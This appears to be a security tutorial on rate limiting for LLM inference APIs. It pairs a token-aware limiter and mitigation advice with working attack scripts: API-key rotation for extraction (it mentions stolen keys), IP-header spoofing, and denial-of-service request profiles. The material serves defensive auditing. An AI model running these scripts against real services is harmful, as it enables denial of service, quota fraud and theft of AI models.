Advanced Rate Limiting Strategies for LLM API Endpoints
Designing, attacking, and defending rate limiting systems for LLM inference APIs to prevent abuse, model extraction, and resource exhaustion
Overview
Rate limiting for LLM APIs is fundamentally more complex than rate limiting traditional web APIs. A standard REST endpoint might handle thousands of identical requests with predictable cost — each request consumes roughly the same CPU time, memory, and bandwidth. LLM inference, however, has wildly variable resource costs: a 10-token prompt requesting 1 completion token is orders of magnitude cheaper than a 100,000-token prompt requesting 4,000 completion tokens. A simple requests-per-minute limit that works for REST APIs is grossly inadequate for LLM endpoints because it treats all requests equally when their actual cost can differ by factors of 10,000 or more.
This asymmetry creates two categories of risk. First, denial of service: an attacker can send a small number of carefully crafted requests that consume massive GPU compute, memory, and time, effectively monopolizing the inference infrastructure. A single request with a maximum-length prompt and maximum output tokens can occupy a GPU for minutes, blocking other users. Second, model extraction: without token-aware rate limiting, an attacker can extract the model's behavior through systematic querying because simple request counting does not constrain the total information transferred from the model.
The challenge is compounded by the diversity of LLM API usage patterns. Streaming responses (Server-Sent Events) maintain long-lived connections. Batch endpoints process multiple prompts per request. Chat completions involve multi-turn conversations with growing context windows. Function calling and tool use add complexity to what constitutes a single "request." Each pattern requires different rate limiting considerations.
This article examines rate limiting from both offensive and defensive perspectives: how to design effective rate limiting for LLM APIs, and how to identify and exploit weaknesses in existing implementations.
LLM Rate Limiting Dimensions
Beyond Requests Per Minute
Effective LLM rate limiting must operate across multiple dimensions simultaneously:
| Dimension | Why It Matters | Example Limit |
|---|---|---|
| Requests per minute (RPM) | Basic abuse prevention | 60 RPM per API key |
| Tokens per minute (TPM) | GPU compute cost control | 100K TPM per API key |
| Input tokens per request | Prevent context window abuse | Max 128K input tokens |
| Output tokens per request | Bound response generation cost | Max 4K output tokens |
| Concurrent requests | GPU memory reservation | 10 concurrent per key |
| Requests per day | Long-term extraction prevention | 10K per day per key |
| Cost per minute | Normalize across model sizes | $1/minute per key |
"""
Multi-dimensional rate limiter for LLM API endpoints.
Implements token-aware limiting using a sliding window algorithm
with separate counters for each dimension.
"""
import time
import threading
from dataclasses import dataclass, field
from typing import Optional
from collections import defaultdict
@dataclass
class RateLimitConfig:
"""Configuration for multi-dimensional LLM rate limiting."""
rpm: int = 60 # Requests per minute
tpm: int = 100_000 # Tokens per minute (input + output)
input_tpm: int = 80_000 # Input tokens per minute
output_tpm: int = 40_000 # Output tokens per minute
max_input_tokens: int = 128_000 # Max input tokens per request
max_output_tokens: int = 4_096 # Max output tokens per request
concurrent: int = 10 # Max concurrent requests
daily_requests: int = 10_000 # Max requests per day
daily_tokens: int = 10_000_000 # Max tokens per day
window_seconds: int = 60 # Sliding window size
@dataclass
class UsageRecord:
"""Tracks usage for a single API key."""
request_timestamps: list[float] = field(default_factory=list)
token_records: list[tuple[float, int, int]] = field(
default_factory=list
) # (timestamp, input_tokens, output_tokens)
active_requests: int = 0
daily_requests: int = 0
daily_tokens: int = 0
daily_reset: float = 0.0
class LLMRateLimiter:
"""
Multi-dimensional rate limiter designed for LLM API endpoints.
Thread-safe with sliding window token counting.
"""
def __init__(self, config: Optional[RateLimitConfig] = None):
self.config = config or RateLimitConfig()
self.usage: dict[str, UsageRecord] = defaultdict(UsageRecord)
self.lock = threading.Lock()
def _clean_window(self, record: UsageRecord, now: float) -> None:
"""Remove entries outside the sliding window."""
cutoff = now - self.config.window_seconds
record.request_timestamps = [
ts for ts in record.request_timestamps if ts > cutoff
]
record.token_records = [
(ts, inp, out) for ts, inp, out in record.token_records
if ts > cutoff
]
# Reset daily counters
if now - record.daily_reset > 86400:
record.daily_requests = 0
record.daily_tokens = 0
record.daily_reset = now
def check_request(
self,
api_key: str,
estimated_input_tokens: int,
requested_output_tokens: int,
) -> tuple[bool, Optional[str], dict]:
"""
Check if a request should be allowed.
Returns:
(allowed, rejection_reason, rate_limit_headers)
"""
now = time.time()
headers: dict[str, str] = {}
with self.lock:
record = self.usage[api_key]
self._clean_window(record, now)
# Check per-request limits
if estimated_input_tokens > self.config.max_input_tokens:
return False, "input_tokens_exceeded", {
"X-RateLimit-Limit-Input-Tokens": str(
self.config.max_input_tokens
),
}
if requested_output_tokens > self.config.max_output_tokens:
return False, "output_tokens_exceeded", {
"X-RateLimit-Limit-Output-Tokens": str(
self.config.max_output_tokens
),
}
# Check RPM
current_rpm = len(record.request_timestamps)
headers["X-RateLimit-Limit-Requests"] = str(self.config.rpm)
headers["X-RateLimit-Remaining-Requests"] = str(
max(0, self.config.rpm - current_rpm)
)
if current_rpm >= self.config.rpm:
return False, "rpm_exceeded", headers
# Check TPM (input + output)
current_input = sum(
inp for _, inp, _ in record.token_records
)
current_output = sum(
out for _, _, out in record.token_records
)
total_tokens = current_input + current_output
estimated_new_total = (
total_tokens + estimated_input_tokens + requested_output_tokens
)
headers["X-RateLimit-Limit-Tokens"] = str(self.config.tpm)
headers["X-RateLimit-Remaining-Tokens"] = str(
max(0, self.config.tpm - total_tokens)
)
if estimated_new_total > self.config.tpm:
return False, "tpm_exceeded", headers
            if current_input + estimated_input_tokens > self.config.input_tpm:
                return False, "input_tpm_exceeded", headers
            if current_output + requested_output_tokens > self.config.output_tpm:
                return False, "output_tpm_exceeded", headers
# Check concurrent requests
if record.active_requests >= self.config.concurrent:
return False, "concurrent_exceeded", headers
# Check daily limits
if record.daily_requests >= self.config.daily_requests:
return False, "daily_requests_exceeded", headers
            # Count only this request's tokens against the daily budget,
            # not the whole sliding-window total
            if record.daily_tokens + estimated_input_tokens + requested_output_tokens > self.config.daily_tokens:
                return False, "daily_tokens_exceeded", headers
# All checks passed — record the request
record.request_timestamps.append(now)
record.active_requests += 1
record.daily_requests += 1
return True, None, headers
def record_completion(
self,
api_key: str,
actual_input_tokens: int,
actual_output_tokens: int,
) -> None:
"""Record actual token usage after request completes."""
now = time.time()
with self.lock:
record = self.usage[api_key]
record.token_records.append(
(now, actual_input_tokens, actual_output_tokens)
)
record.active_requests = max(0, record.active_requests - 1)
record.daily_tokens += actual_input_tokens + actual_output_tokens
def get_usage_stats(self, api_key: str) -> dict:
"""Get current usage statistics for an API key."""
now = time.time()
with self.lock:
record = self.usage[api_key]
self._clean_window(record, now)
input_tokens = sum(
inp for _, inp, _ in record.token_records
)
output_tokens = sum(
out for _, _, out in record.token_records
)
return {
"rpm_used": len(record.request_timestamps),
"rpm_limit": self.config.rpm,
"tpm_used": input_tokens + output_tokens,
"tpm_limit": self.config.tpm,
"input_tpm_used": input_tokens,
"output_tpm_used": output_tokens,
"concurrent_used": record.active_requests,
"concurrent_limit": self.config.concurrent,
"daily_requests_used": record.daily_requests,
"daily_requests_limit": self.config.daily_requests,
            }
Attacking Rate Limiters
Identity Rotation
The most straightforward rate limit bypass is to use multiple identities. If rate limits are enforced per API key, an attacker with access to many keys (purchased, stolen, or generated through self-service signup) can multiply their effective rate limit:
"""
Rate limit bypass through API key rotation.
Demonstrates how multi-key strategies defeat per-key rate limiting.
"""
import requests
import time
import itertools
from typing import Optional
from concurrent.futures import ThreadPoolExecutor, as_completed
class RateLimitBypass:
"""
Bypass per-key rate limits by rotating across multiple API keys.
"""
def __init__(
self,
target_url: str,
api_keys: list[str],
):
self.target_url = target_url
self.api_keys = api_keys
self.key_cycle = itertools.cycle(api_keys)
self.key_usage: dict[str, int] = {k: 0 for k in api_keys}
self.total_requests = 0
self.total_tokens = 0
def _get_next_key(self) -> str:
"""Get the next API key in the rotation."""
return next(self.key_cycle)
    def send_request(
        self,
        prompt: str,
        max_tokens: int = 100,
    ) -> Optional[dict]:
        """Send a request, rotating to a fresh key on a 429 response."""
        # Try each key at most once so we never recurse forever when
        # every key in the pool is rate limited.
        for _ in range(len(self.api_keys)):
            api_key = self._get_next_key()
            try:
                resp = requests.post(
                    f"{self.target_url}/v1/completions",
                    headers={"Authorization": f"Bearer {api_key}"},
                    json={
                        "model": "target-model",
                        "prompt": prompt,
                        "max_tokens": max_tokens,
                        "temperature": 0.0,
                    },
                    timeout=60,
                )
            except requests.RequestException:
                return None
            self.key_usage[api_key] += 1
            self.total_requests += 1
            if resp.status_code == 200:
                data = resp.json()
                usage = data.get("usage", {})
                self.total_tokens += usage.get("total_tokens", 0)
                return data
            if resp.status_code != 429:
                return None
            # 429: this key is exhausted, fall through to the next one
        return None
def parallel_extraction(
self,
prompts: list[str],
max_workers: int = 10,
) -> list[dict]:
"""
Send multiple requests in parallel across all keys.
Effective rate = per_key_rate * num_keys.
"""
results = []
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = {
executor.submit(self.send_request, p): p
for p in prompts
}
for future in as_completed(futures):
result = future.result()
if result:
results.append(result)
return results
def report(self) -> dict:
"""Generate a report of the bypass attempt."""
return {
"total_requests": self.total_requests,
"total_tokens": self.total_tokens,
"keys_used": len(self.api_keys),
"per_key_usage": self.key_usage,
"effective_multiplier": (
self.total_requests / max(
self.key_usage.values(), default=1
)
),
        }
Header Manipulation and IP Spoofing
Some rate limiters use the client IP address or forwarded-for headers for identification. Behind load balancers or CDNs, the true client IP is often communicated through headers like X-Forwarded-For, X-Real-IP, or CF-Connecting-IP. If the rate limiter trusts these headers from any source, an attacker can spoof different IP addresses:
"""
Rate limit bypass through header manipulation.
Tests if the target trusts client-provided IP headers.
"""
import requests
import random
from typing import Optional
def generate_random_ip() -> str:
    """Generate a random, plausibly public IPv4 address."""
    while True:
        first_octet = random.randint(1, 223)
        # Crude filter: skip first octets that contain common private,
        # loopback, or link-local ranges (this over-excludes some
        # legitimate public space, which is fine for a test tool)
        if first_octet in (10, 127, 169, 172, 192):
            continue
        return (
            f"{first_octet}.{random.randint(0, 255)}."
            f"{random.randint(0, 255)}.{random.randint(1, 254)}"
        )
def test_header_bypass(
target_url: str,
api_key: str,
num_requests: int = 100,
) -> dict:
"""
Test if the rate limiter can be bypassed by spoofing IP headers.
Sends requests with different X-Forwarded-For headers.
"""
results = {"success": 0, "rate_limited": 0, "error": 0}
# Headers that various proxies/LBs use for client IP
ip_headers = [
"X-Forwarded-For",
"X-Real-IP",
"X-Client-IP",
"CF-Connecting-IP",
"True-Client-IP",
"X-Originating-IP",
]
for i in range(num_requests):
fake_ip = generate_random_ip()
headers = {
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
}
# Set all known IP headers to the same fake IP
for header_name in ip_headers:
headers[header_name] = fake_ip
try:
resp = requests.post(
f"{target_url}/v1/completions",
headers=headers,
json={
"model": "target-model",
"prompt": f"Test request {i}",
"max_tokens": 1,
},
timeout=30,
)
if resp.status_code == 200:
results["success"] += 1
elif resp.status_code == 429:
results["rate_limited"] += 1
else:
results["error"] += 1
except requests.RequestException:
results["error"] += 1
# Analyze results
if results["rate_limited"] == 0 and results["success"] > 0:
results["verdict"] = (
"VULNERABLE: No rate limiting observed with IP header spoofing. "
"The rate limiter may trust X-Forwarded-For from untrusted sources."
)
elif results["rate_limited"] > 0 and results["success"] > results["rate_limited"]:
results["verdict"] = (
"PARTIALLY VULNERABLE: Rate limiting is inconsistent, "
"suggesting IP headers partially influence rate limit identity."
)
else:
results["verdict"] = (
"NOT VULNERABLE: Rate limiting was consistently enforced "
"regardless of IP header values."
)
    return results
Timing and Resource Exhaustion
Even with proper rate limiting, LLM APIs can be vulnerable to resource exhaustion through carefully crafted requests that maximize compute cost per request:
- Maximum context window: Send prompts that fill the entire context window. The compute cost of attention scales quadratically with sequence length.
- Maximum output tokens: Request the maximum allowed output tokens to occupy the GPU for as long as possible.
- Adversarial prompts: Craft prompts that cause the model to produce long, repetitive outputs or enter slow generation paths.
- Streaming connection holding: Open streaming connections and read very slowly, holding server resources.
"""
Resource exhaustion attack testing for LLM APIs.
Measures the actual GPU cost of different request profiles
to identify the most cost-effective denial-of-service vectors.
"""
import requests
import time
import concurrent.futures
from dataclasses import dataclass
from typing import Optional
@dataclass
class RequestProfile:
"""A request configuration designed to test resource limits."""
name: str
prompt: str
max_tokens: int
temperature: float = 0.0
stream: bool = False
class ResourceExhaustionTester:
"""
Test LLM API resilience to resource exhaustion attacks.
Measures server response time and availability under
various adversarial request profiles.
"""
def __init__(self, target_url: str, api_key: str):
self.target_url = target_url.rstrip("/")
self.api_key = api_key
self.results: list[dict] = []
def _send_request(self, profile: RequestProfile) -> dict:
"""Send a single request and measure resource consumption."""
start = time.time()
try:
resp = requests.post(
f"{self.target_url}/v1/completions",
headers={"Authorization": f"Bearer {self.api_key}"},
json={
"model": "default",
"prompt": profile.prompt,
"max_tokens": profile.max_tokens,
"temperature": profile.temperature,
"stream": profile.stream,
},
timeout=120,
)
elapsed = time.time() - start
usage = {}
if resp.status_code == 200:
data = resp.json()
usage = data.get("usage", {})
return {
"profile": profile.name,
"status": resp.status_code,
"elapsed_seconds": elapsed,
"prompt_tokens": usage.get("prompt_tokens", 0),
"completion_tokens": usage.get("completion_tokens", 0),
"total_tokens": usage.get("total_tokens", 0),
"cost_per_second": (
usage.get("total_tokens", 0) / max(elapsed, 0.001)
),
}
except requests.Timeout:
return {
"profile": profile.name,
"status": 0,
"elapsed_seconds": time.time() - start,
"error": "timeout",
}
except requests.ConnectionError:
return {
"profile": profile.name,
"status": 0,
"elapsed_seconds": time.time() - start,
"error": "connection_lost",
}
def generate_attack_profiles(self) -> list[RequestProfile]:
"""Generate request profiles that stress different resources."""
profiles = [
# Baseline: minimal request
RequestProfile(
name="baseline",
prompt="Hi",
max_tokens=1,
),
# Long input, short output (KV cache pressure)
RequestProfile(
name="long_input",
prompt="Summarize: " + "The quick brown fox. " * 5000,
max_tokens=10,
),
# Short input, long output (generation time)
RequestProfile(
name="long_output",
prompt="Write a very detailed essay about:",
max_tokens=4096,
),
# Long input AND long output (maximum resource)
RequestProfile(
name="max_resources",
prompt="Expand on each point: " + "Point. " * 5000,
max_tokens=4096,
),
# Repetitive input (potential degenerate attention)
RequestProfile(
name="repetitive",
prompt="repeat " * 10000,
max_tokens=100,
),
# Streaming (holds connection)
RequestProfile(
name="streaming_hold",
prompt="Tell me a very long story",
max_tokens=4096,
stream=True,
),
]
return profiles
def run_availability_test(
self,
attack_profile: RequestProfile,
num_attack_requests: int = 10,
num_probe_requests: int = 5,
) -> dict:
"""
Test if attack requests degrade service for legitimate requests.
Sends attack requests concurrently, then measures probe latency.
"""
baseline_profile = RequestProfile(
name="probe", prompt="What is 2+2?", max_tokens=5,
)
# Measure baseline latency
baseline_times = []
for _ in range(num_probe_requests):
result = self._send_request(baseline_profile)
if result.get("status") == 200:
baseline_times.append(result["elapsed_seconds"])
avg_baseline = (
sum(baseline_times) / len(baseline_times)
if baseline_times else 0
)
# Send attack requests concurrently
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_attack_requests
) as executor:
attack_futures = [
executor.submit(self._send_request, attack_profile)
for _ in range(num_attack_requests)
]
# While attack is running, measure probe latency
time.sleep(1) # Brief delay to let attacks start
probe_times = []
for _ in range(num_probe_requests):
result = self._send_request(baseline_profile)
if result.get("status") == 200:
probe_times.append(result["elapsed_seconds"])
elif result.get("status") == 429:
probe_times.append(-1) # Rate limited
# Collect attack results
attack_results = [f.result() for f in attack_futures]
avg_under_attack = (
sum(t for t in probe_times if t > 0)
/ max(len([t for t in probe_times if t > 0]), 1)
)
rate_limited_probes = sum(1 for t in probe_times if t == -1)
return {
"attack_profile": attack_profile.name,
"baseline_latency_ms": avg_baseline * 1000,
"attack_latency_ms": avg_under_attack * 1000,
"latency_increase": (
(avg_under_attack / max(avg_baseline, 0.001) - 1) * 100
),
"probes_rate_limited": rate_limited_probes,
"attack_successes": sum(
1 for r in attack_results if r.get("status") == 200
),
"attack_blocked": sum(
1 for r in attack_results if r.get("status") == 429
),
        }
Session and Token Reuse Attacks
Another class of rate limit bypass targets the session and token lifecycle. Many LLM API providers use JWT tokens or session tokens for authentication, and the rate limit is tied to the token identity. Attacks include:
- Token farming: Creating many free-tier accounts to accumulate API tokens, then using them in rotation for high-volume querying.
- Token sharing services: Underground services that pool stolen or leaked API keys, distributing requests across all keys to stay under per-key limits.
- Session fixation: If the rate limiter uses session cookies, an attacker may be able to generate new sessions rapidly by clearing cookies between requests.
- OAuth token rotation: Rapidly requesting new OAuth access tokens from the authorization server, where each new token gets a fresh rate limit window.
Defending against these attacks requires correlating usage across identity dimensions — detecting that 50 different API keys are making identical queries from the same IP range, or that token creation velocity for an account is abnormally high.
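The correlation idea above can be sketched as a small detector that hashes each prompt and counts how many distinct API keys issue the same prompt from the same IP range. The `CrossKeyCorrelator` name, the /16 grouping, and the threshold are illustrative choices, not a production design:

```python
"""
Sketch: correlate usage across identity dimensions to detect a single
operator rotating API keys. Flags prompts that arrive from many
distinct keys within the same IP range.
"""
import hashlib
from collections import defaultdict


class CrossKeyCorrelator:
    """Detect many API keys issuing identical prompts from one IP range."""

    def __init__(self, key_threshold: int = 5):
        self.key_threshold = key_threshold
        # (prompt_hash, /16 prefix) -> set of API keys seen
        self.sightings: dict[tuple[str, str], set[str]] = defaultdict(set)

    @staticmethod
    def _prefix(ip: str) -> str:
        """Collapse an IPv4 address to its /16 prefix."""
        return ".".join(ip.split(".")[:2])

    def observe(self, api_key: str, client_ip: str, prompt: str) -> bool:
        """Record a request; return True if it looks coordinated."""
        prompt_hash = hashlib.sha256(prompt.encode()).hexdigest()[:16]
        bucket = (prompt_hash, self._prefix(client_ip))
        self.sightings[bucket].add(api_key)
        return len(self.sightings[bucket]) >= self.key_threshold
```

In practice the sightings table would live in a shared store with a TTL, and the prefix grouping would use proper CIDR aggregation rather than string splitting.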
Practical Examples
Rate Limit Audit Tool
#!/usr/bin/env bash
# Quick audit of rate limiting configuration on an LLM API endpoint
TARGET="${1:?Usage: $0 <api_url> <api_key>}"
API_KEY="${2:?Usage: $0 <api_url> <api_key>}"
echo "=== LLM API Rate Limit Audit ==="
echo "Target: $TARGET"
echo ""
# Test 1: Check rate limit headers
echo "--- Rate Limit Headers ---"
RESP=$(curl -s -D - -o /dev/null \
-X POST "${TARGET}/v1/completions" \
-H "Authorization: Bearer ${API_KEY}" \
-H "Content-Type: application/json" \
-d '{"model":"default","prompt":"test","max_tokens":1}')
echo "$RESP" | grep -iE "x-ratelimit|retry-after|ratelimit" || echo "No rate limit headers found"
echo ""
echo "--- Burst Test (20 rapid requests) ---"
SUCCESS=0
LIMITED=0
for i in $(seq 1 20); do
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "${TARGET}/v1/completions" \
-H "Authorization: Bearer ${API_KEY}" \
-H "Content-Type: application/json" \
-d '{"model":"default","prompt":"test","max_tokens":1}')
if [ "$CODE" = "200" ]; then
SUCCESS=$((SUCCESS + 1))
elif [ "$CODE" = "429" ]; then
LIMITED=$((LIMITED + 1))
fi
done
echo "Successful: $SUCCESS, Rate limited: $LIMITED"
if [ "$LIMITED" -eq 0 ]; then
echo "[WARN] No rate limiting triggered during burst"
fi
echo ""
echo "--- Token-based Rate Limit Test ---"
# Send a request with high token count
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "${TARGET}/v1/completions" \
-H "Authorization: Bearer ${API_KEY}" \
-H "Content-Type: application/json" \
-d '{"model":"default","prompt":"'"$(python3 -c "print('word ' * 10000)")"'","max_tokens":4096}')
echo "Large request (10K input + 4K output tokens): HTTP $CODE"
echo ""
echo "=== Audit Complete ==="Defense and Mitigation
Multi-dimensional rate limiting: Implement limits on both requests and tokens. OpenAI's rate limiting model is a good reference — they enforce RPM, TPM, RPD (requests per day), and TPD (tokens per day) limits simultaneously.
Cost-based rate limiting: Assign a cost to each request based on actual GPU compute consumed (proportional to input_length * output_length for attention-based models) and limit total cost per time window. This naturally handles the asymmetry between cheap and expensive requests.
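A minimal sketch of cost-based limiting, assuming a cost function proportional to input_tokens * output_tokens drawn against a per-key refilling bucket. The `CostBucket` name and the /1000 scaling are arbitrary choices for illustration:

```python
"""
Sketch: charge each request a cost proportional to
input_tokens * output_tokens (a rough proxy for attention compute),
drawn from a token bucket that refills over time.
"""
import time


class CostBucket:
    """Bucket that refills at `rate` cost units per second, up to `capacity`."""

    def __init__(self, capacity: float, rate: float):
        self.capacity = capacity
        self.rate = rate
        self.level = capacity
        self.last = time.monotonic()

    def request_cost(self, input_tokens: int, output_tokens: int) -> float:
        # Proxy for compute: grows with both input and output length
        return input_tokens * max(output_tokens, 1) / 1000.0

    def try_spend(self, input_tokens: int, output_tokens: int) -> bool:
        """Refill, then deduct the request's cost if the budget allows."""
        now = time.monotonic()
        self.level = min(self.capacity, self.level + (now - self.last) * self.rate)
        self.last = now
        cost = self.request_cost(input_tokens, output_tokens)
        if cost > self.level:
            return False
        self.level -= cost
        return True
```

A single max-context, max-output request is charged orders of magnitude more than a short one, so the asymmetry the article describes is priced in directly.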
API key management: Implement key issuance controls that prevent bulk key generation. Require identity verification for API access. Monitor for keys with correlated usage patterns that suggest a single operator rotating keys.
IP and fingerprint defense-in-depth: Do not rely solely on IP-based rate limiting. Use API key as the primary identity, IP address as secondary, and consider device fingerprinting for web-based access. Always extract the true client IP from trusted proxy headers only — configure your reverse proxy chain correctly and strip these headers from untrusted sources.
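One way to sketch trusted-header extraction, assuming the load balancer sits in 10.0.0.0/8 and appends the true client IP as the last X-Forwarded-For element. Both assumptions must be adapted to your actual proxy topology:

```python
"""
Sketch: derive the rate-limit identity IP, trusting X-Forwarded-For
only when the TCP peer is a known proxy.
"""
import ipaddress
from typing import Optional

# Assumed load-balancer subnet; replace with your real proxy addresses
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def client_ip(peer_ip: str, xff_header: Optional[str]) -> str:
    """Return the IP to use as rate-limit identity for a connection."""
    peer = ipaddress.ip_address(peer_ip)
    if not any(peer in net for net in TRUSTED_PROXIES):
        # Direct connection: X-Forwarded-For is client-controlled, ignore it
        return peer_ip
    if not xff_header:
        return peer_ip
    # Trust only the last element, which our own proxy appended
    return xff_header.split(",")[-1].strip()
```

Anything earlier in the header chain is attacker-writable, which is exactly what the spoofing test in the previous section probes for.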
Anomaly detection: Monitor for patterns that indicate extraction attempts: high volume of low-temperature requests, systematic input variations, unusual prompt distributions, and access from known VPN/proxy ranges. Flag accounts that exhibit these patterns for review.
Adaptive rate limiting: Reduce rate limits for accounts showing suspicious patterns rather than hard-blocking them. This makes detection harder for attackers and provides a more gradual degradation of service for borderline cases.
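The adaptive idea can be sketched as a per-key suspicion score in [0, 1] that linearly scales the effective RPM limit down to a floor instead of hard-blocking. The class name, increments, and floor are illustrative:

```python
"""
Sketch: degrade a suspicious key's rate limit gradually rather than
blocking it outright, making detection harder to confirm.
"""


class AdaptiveLimit:
    """Scale a base RPM limit by a per-key suspicion score."""

    def __init__(self, base_rpm: int = 60, floor_rpm: int = 5):
        self.base_rpm = base_rpm
        self.floor_rpm = floor_rpm
        self.suspicion: dict[str, float] = {}

    def raise_suspicion(self, api_key: str, amount: float = 0.25) -> None:
        """Bump a key's score, capped at 1.0."""
        score = min(1.0, self.suspicion.get(api_key, 0.0) + amount)
        self.suspicion[api_key] = score

    def effective_rpm(self, api_key: str) -> int:
        """Interpolate between the base limit and the floor."""
        score = self.suspicion.get(api_key, 0.0)
        return max(self.floor_rpm, round(self.base_rpm * (1.0 - score)))
```

The anomaly-detection signals from the previous paragraph would feed `raise_suspicion`; a decay term would let scores recover over time.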
Streaming-aware rate limiting: For streaming responses (Server-Sent Events), implement connection-level limits in addition to request-level limits. Track the total time a connection has been open and the total tokens streamed. An attacker who opens many streaming connections simultaneously can exhaust server connection pools even within per-request rate limits. Implement maximum concurrent streaming connections per API key and maximum total stream duration.
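The connection-level accounting described above might look like this sketch, which caps concurrent streams per key and flags streams that exceed a duration budget. `StreamTracker` and its limits are hypothetical:

```python
"""
Sketch: per-key accounting for streaming (SSE) connections, enforcing
a concurrency cap and a maximum stream duration.
"""
import time
from collections import defaultdict
from typing import Optional


class StreamTracker:
    def __init__(self, max_streams: int = 3, max_duration: float = 300.0):
        self.max_streams = max_streams
        self.max_duration = max_duration
        # api_key -> {stream_id: start_time}
        self.streams: dict[str, dict[int, float]] = defaultdict(dict)
        self._next_id = 0

    def open(self, api_key: str) -> Optional[int]:
        """Register a stream; returns a stream id, or None if over the cap."""
        if len(self.streams[api_key]) >= self.max_streams:
            return None
        self._next_id += 1
        self.streams[api_key][self._next_id] = time.monotonic()
        return self._next_id

    def should_terminate(self, api_key: str, stream_id: int) -> bool:
        """True once the stream exceeds the duration budget."""
        start = self.streams[api_key].get(stream_id)
        return start is not None and time.monotonic() - start > self.max_duration

    def close(self, api_key: str, stream_id: int) -> None:
        self.streams[api_key].pop(stream_id, None)
```

The server would poll `should_terminate` between streamed chunks, closing slow-reading connections that would otherwise pin resources indefinitely.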
Request fingerprinting: Beyond API key and IP address, fingerprint requests based on their content patterns. A legitimate user's prompts have natural language characteristics — varying length, diverse vocabulary, context-dependent content. Model extraction queries tend to be more systematic: uniform length, methodical topic coverage, low temperature, and logprobs requested. Building a behavioral fingerprint per API key and alerting on sudden changes in query patterns can detect extraction even when the attacker stays within rate limits.
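As a rough illustration, two cheap statistics over a key's recent prompts, length uniformity and vocabulary diversity, can separate systematic querying from natural usage. The thresholds here are illustrative, not tuned:

```python
"""
Sketch: flag a prompt history whose lengths are near-uniform and whose
vocabulary is unusually repetitive, two traits of extraction queries.
"""
import statistics


def looks_systematic(prompts: list[str], min_samples: int = 10) -> bool:
    """Heuristic check for template-driven, systematic querying."""
    if len(prompts) < min_samples:
        return False
    lengths = [len(p.split()) for p in prompts]
    vocab = {w for p in prompts for w in p.split()}
    total_words = sum(lengths)
    # Coefficient of variation of prompt length: ~0 for templated queries
    length_cv = statistics.pstdev(lengths) / max(statistics.mean(lengths), 1)
    # Type-token ratio: low when the same template words repeat
    diversity = len(vocab) / max(total_words, 1)
    return length_cv < 0.1 and diversity < 0.2
```

A production fingerprint would track these statistics incrementally per key and alert on sudden shifts rather than absolute thresholds.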
Defense against distributed extraction: When an attacker coordinates extraction across many API keys and IP addresses, individual-key rate limiting is insufficient. Implement aggregate rate limiting that caps the total query volume to a specific model across all keys. Monitor the total unique prompt diversity across all clients — a distributed extraction campaign will show an unnaturally systematic coverage of the input space even when no individual client exceeds their limits.
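An aggregate cap can be sketched as a single sliding-window token budget shared by every client of a model, so adding keys cannot raise the ceiling. The class name and window size are illustrative:

```python
"""
Sketch: a global per-model token budget per sliding window, enforced
across all API keys and IPs.
"""
import time
from collections import deque


class AggregateModelLimit:
    """Cap total tokens served by one model across all clients."""

    def __init__(self, tokens_per_window: int, window_seconds: float = 60.0):
        self.tokens_per_window = tokens_per_window
        self.window_seconds = window_seconds
        self.events: deque[tuple[float, int]] = deque()  # (timestamp, tokens)
        self.total = 0

    def allow(self, tokens: int) -> bool:
        """Admit the request only if the shared budget has room."""
        now = time.monotonic()
        cutoff = now - self.window_seconds
        # Expire entries that fell out of the window
        while self.events and self.events[0][0] <= cutoff:
            _, old = self.events.popleft()
            self.total -= old
        if self.total + tokens > self.tokens_per_window:
            return False
        self.events.append((now, tokens))
        self.total += tokens
        return True
```

In a real deployment this counter would live in shared storage (e.g. Redis) so every inference node draws from the same budget.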
Output perturbation as a defense: Rather than relying solely on rate limiting to prevent model extraction, add small random perturbations to model outputs. For classification models, add Laplace or Gaussian noise to confidence scores. For generative models, vary the sampling temperature slightly between requests. These perturbations are imperceptible to legitimate users but degrade the quality of extracted training data, requiring significantly more queries for a successful extraction. This defense is complementary to rate limiting and provides protection even when rate limits are bypassed. Research from Tramèr et al. shows that even small output perturbations can increase the query cost of model extraction by orders of magnitude while maintaining acceptable service quality for legitimate users.
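A sketch of output perturbation for a classification endpoint, assuming confidence scores are returned to the client: Laplace noise is added, scores are renormalized, and the argmax is kept stable so legitimate users see the same label. The function names and noise scale are illustrative:

```python
"""
Sketch: add Laplace noise to returned confidence scores while keeping
the predicted label unchanged for legitimate users.
"""
import random


def laplace(scale: float) -> float:
    """Sample Laplace(0, scale) as the difference of two exponentials."""
    return random.expovariate(1.0 / scale) - random.expovariate(1.0 / scale)


def perturb_confidences(
    scores: dict[str, float], scale: float = 0.01
) -> dict[str, float]:
    """Return noised, renormalized scores with the top label preserved."""
    top = max(scores, key=scores.get)
    noised = {k: max(1e-6, v + laplace(scale)) for k, v in scores.items()}
    # Keep the argmax stable so the visible label never flips
    if max(noised, key=noised.get) != top:
        noised[top] = max(noised.values()) + 1e-6
    total = sum(noised.values())
    return {k: v / total for k, v in noised.items()}
```

The exact scores an extraction attacker harvests are now noisy, while the label a legitimate user acts on is unchanged.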
References
- OpenAI. (2025). "Rate Limits." OpenAI Platform Documentation. https://platform.openai.com/docs/guides/rate-limits
- OWASP. (2024). "Blocking Brute Force Attacks." https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks
- Tramèr, F., Zhang, F., Juels, A., Reiter, M. K., & Ristenpart, T. (2016). "Stealing Machine Learning Models via Prediction APIs." USENIX Security Symposium. https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/tramer
- MITRE ATLAS. "Exfiltration via ML Inference API." https://atlas.mitre.org/techniques/AML.T0024